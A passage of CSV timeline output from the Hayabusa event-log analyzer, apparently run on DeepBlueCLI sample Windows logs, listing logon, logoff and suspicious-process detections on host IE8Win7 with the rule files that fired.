memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 04:38:41.448 +09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE8WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x24936 : (Warning: Credentials are stored in 
memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 04:38:41.448 +09:00,IE8Win7,4672,informational,Admin Logon,User: IEUser : LogonID: 0x24902,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 04:39:04.000 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2013-10-24 04:39:04.000 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2013-10-24 04:42:34.667 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 04:42:34.667 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 04:42:34.667 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 04:42:56.213 +09:00,IE8Win7,4647,informational,Logoff - User Initiated,User: IEUser : LogonID: 0x24936,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 04:45:27.593 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 04:45:27.593 +09:00,IE8Win7,1,high,Execution Of Other File Type Than 
.exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 04:45:58.015 +09:00,IE8Win7,4624,informational,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 04:46:01.000 +09:00,IE8Win7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2013-10-24 04:46:10.368 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 04:46:10.368 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 04:46:10.368 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 04:47:07.743 +09:00,IE8Win7,4648,informational,Explicit Logon,Source User: IE8WIN7$ : Target User: IEUser : IP Address: 127.0.0.1 : Process: C:\Windows\System32\winlogon.exe : Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 04:47:07.743 +09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE8WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x19489 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 04:47:07.743 +09:00,IE8Win7,4624,informational,Logon Type 2 - 
Interactive,User: IEUser : Workstation: IE8WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x194bb : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 04:47:07.743 +09:00,IE8Win7,4672,informational,Admin Logon,User: IEUser : LogonID: 0x19489,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 04:49:30.000 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2013-10-24 04:49:30.000 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2013-10-24 04:54:00.258 +09:00,IE8Win7,4647,informational,Logoff - User Initiated,User: IEUser : LogonID: 0x194bb,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 04:54:45.140 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 04:54:45.140 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 04:54:58.140 +09:00,IE8Win7,4624,informational,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 04:55:02.000 +09:00,IE8Win7,4625,medium,Failed Logon From Public 
IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2013-10-24 04:55:06.370 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 04:55:06.370 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 04:55:06.370 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 04:55:29.463 +09:00,IE8Win7,4648,informational,Explicit Logon,Source User: IE8WIN7$ : Target User: IEUser : IP Address: 127.0.0.1 : Process: C:\Windows\System32\winlogon.exe : Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 04:55:29.463 +09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE8WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x19153 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 04:55:29.463 +09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE8WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x1917f : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 04:55:29.463 +09:00,IE8Win7,4672,informational,Admin Logon,User: IEUser : LogonID: 
0x19153,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 04:57:31.000 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2013-10-24 04:57:31.000 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2013-10-24 05:49:57.323 +09:00,IE8Win7,4647,informational,Logoff - User Initiated,User: IEUser : LogonID: 0x1917f,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 05:53:53.609 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 05:53:53.609 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 05:54:11.078 +09:00,IE8Win7,4624,informational,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 05:54:23.000 +09:00,IE8Win7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2013-10-24 05:54:29.619 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 05:54:29.619 +09:00,IE8Win7,1,high,Execution Of Other File Type Than 
.exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 05:54:29.619 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 05:55:00.775 +09:00,IE8Win7,4648,informational,Explicit Logon,Source User: IE8WIN7$ : Target User: IEUser : IP Address: 127.0.0.1 : Process: C:\Windows\System32\winlogon.exe : Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 05:55:00.775 +09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE8WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x2b15e : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 05:55:00.775 +09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE8WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x2b18a : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 05:55:00.775 +09:00,IE8Win7,4672,informational,Admin Logon,User: IEUser : LogonID: 0x2b15e,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 05:56:36.634 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 05:56:36.634 +09:00,IE8Win7,1,high,Execution Of Other File Type Than 
.exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 05:56:36.649 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 05:56:52.000 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2013-10-24 05:56:52.000 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2013-10-24 06:05:37.180 +09:00,IE8Win7,4647,informational,Logoff - User Initiated,User: IEUser : LogonID: 0x2b18a,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 06:07:06.390 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 06:07:06.390 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 06:07:31.859 +09:00,IE8Win7,4624,informational,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 06:07:35.000 +09:00,IE8Win7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2013-10-24 06:07:44.487 +09:00,IE8Win7,1,high,Execution Of Not Existing 
File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 06:07:44.487 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 06:07:44.487 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 06:09:53.000 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2013-10-24 06:09:53.000 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2013-10-24 06:13:38.283 +09:00,IE8Win7,4648,informational,Explicit Logon,Source User: IE8WIN7$ : Target User: IEUser : IP Address: 127.0.0.1 : Process: C:\Windows\System32\winlogon.exe : Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 06:13:38.283 +09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE8WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x25519 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 06:13:38.283 +09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE8WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x2553c : (Warning: Credentials are stored in 
memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 06:13:38.283 +09:00,IE8Win7,4672,informational,Admin Logon,User: IEUser : LogonID: 0x25519,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 06:35:27.013 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 06:35:27.013 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 06:35:27.028 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 06:50:27.138 +09:00,IE8Win7,4648,informational,Explicit Logon,Source User: IEUser : Target User: rdavis : IP Address: - : Process: : Target Server: cifs/rdavis-7.sharplogic.local,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 06:53:45.841 +09:00,IE8Win7,4648,informational,Explicit Logon,Source User: IE8WIN7$ : Target User: IEUser : IP Address: - : Process: C:\Windows\System32\svchost.exe : Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 06:53:45.841 +09:00,IE8Win7,4624,informational,Logon Type 4 - Batch,User: IEUser : Workstation: IE8WIN7 : IP Address: - : Port: - : LogonID: 0x15f454,rules/hayabusa/default/events/Security/Logons/4624_LogonType-4-Batch.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 06:53:45.841 
+09:00,IE8Win7,4672,informational,Admin Logon,User: IEUser : LogonID: 0x15f454,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 06:53:45.919 +09:00,IE8Win7,4634,informational,Logoff,User: IEUser : LogonID: 0x15f454,rules/hayabusa/default/events/Security/Logons/4634_Logoff.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 06:53:46.263 +09:00,IE8Win7,4648,informational,Explicit Logon,Source User: IE8WIN7$ : Target User: IEUser : IP Address: - : Process: C:\Windows\System32\lsass.exe : Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 06:53:46.263 +09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE8WIN7 : IP Address: - : Port: - : LogonID: 0x15f53a : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 06:53:46.263 +09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE8WIN7 : IP Address: - : Port: - : LogonID: 0x15f546 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 06:53:46.263 +09:00,IE8Win7,4672,informational,Admin Logon,User: IEUser : LogonID: 0x15f53a,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 06:53:46.669 +09:00,IE8Win7,4634,informational,Logoff,User: IEUser : LogonID: 0x15f546,rules/hayabusa/default/events/Security/Logons/4634_Logoff.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 06:53:46.669 +09:00,IE8Win7,4634,informational,Logoff,User: 
IEUser : LogonID: 0x15f53a,rules/hayabusa/default/events/Security/Logons/4634_Logoff.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 06:54:01.732 +09:00,IE8Win7,4647,informational,Logoff - User Initiated,User: IEUser : LogonID: 0x2553c,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 06:55:02.343 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 06:55:02.343 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 06:55:25.000 +09:00,IE8Win7,4624,informational,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 06:55:32.000 +09:00,IE8Win7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2013-10-24 06:55:35.625 +09:00,IE8Win7,4648,informational,Explicit Logon,Source User: IE8WIN7$ : Target User: IEUser : IP Address: 127.0.0.1 : Process: C:\Windows\System32\winlogon.exe : Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 06:55:35.625 +09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE8WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0xdad4 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 06:55:35.625 
+09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE8WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0xdafc : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 06:55:35.625 +09:00,IE8Win7,4672,informational,Admin Logon,User: IEUser : LogonID: 0xdad4,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 06:55:37.450 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 06:55:37.450 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 06:55:37.450 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 06:55:44.840 +09:00,IE8Win7,4648,informational,Explicit Logon,Source User: IE8WIN7$ : Target User: IEUser : IP Address: - : Process: C:\Windows\System32\svchost.exe : Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 06:55:44.840 +09:00,IE8Win7,4624,informational,Logon Type 4 - Batch,User: IEUser : Workstation: IE8WIN7 : IP Address: - : Port: - : LogonID: 0x13dbc,rules/hayabusa/default/events/Security/Logons/4624_LogonType-4-Batch.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 06:55:44.840 +09:00,IE8Win7,4672,informational,Admin Logon,User: IEUser : LogonID: 
0x13dbc,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 06:57:51.000 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2013-10-24 06:57:51.000 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2013-10-24 07:00:55.356 +09:00,IE8Win7,4647,informational,Logoff - User Initiated,User: IEUser : LogonID: 0xdafc,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 07:00:55.903 +09:00,IE8Win7,4634,informational,Logoff,User: IEUser : LogonID: 0xdafc,rules/hayabusa/default/events/Security/Logons/4634_Logoff.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 07:00:55.903 +09:00,IE8Win7,4634,informational,Logoff,User: IEUser : LogonID: 0xdad4,rules/hayabusa/default/events/Security/Logons/4634_Logoff.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 07:01:28.840 +09:00,IE8Win7,4648,informational,Explicit Logon,Source User: IE8WIN7$ : Target User: IEUser : IP Address: 127.0.0.1 : Process: C:\Windows\System32\winlogon.exe : Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 07:01:28.840 +09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE8WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x4bafc : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 07:01:28.840 
+09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE8WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x4bb14 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 07:01:28.840 +09:00,IE8Win7,4672,informational,Admin Logon,User: IEUser : LogonID: 0x4bafc,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 07:04:16.809 +09:00,IE8Win7,4647,informational,Logoff - User Initiated,User: IEUser : LogonID: 0x4bb14,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 07:05:00.218 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 07:05:00.218 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 07:05:21.859 +09:00,IE8Win7,4624,informational,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 07:05:31.000 +09:00,IE8Win7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2013-10-24 07:05:32.609 +09:00,IE8Win7,4648,informational,Explicit Logon,Source User: IE8WIN7$ : Target User: IEUser : IP Address: 127.0.0.1 : Process: C:\Windows\System32\winlogon.exe : Target Server: 
localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 07:05:32.609 +09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE8WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0xd99e : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 07:05:32.609 +09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE8WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0xd9c6 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 07:05:32.609 +09:00,IE8Win7,4672,informational,Admin Logon,User: IEUser : 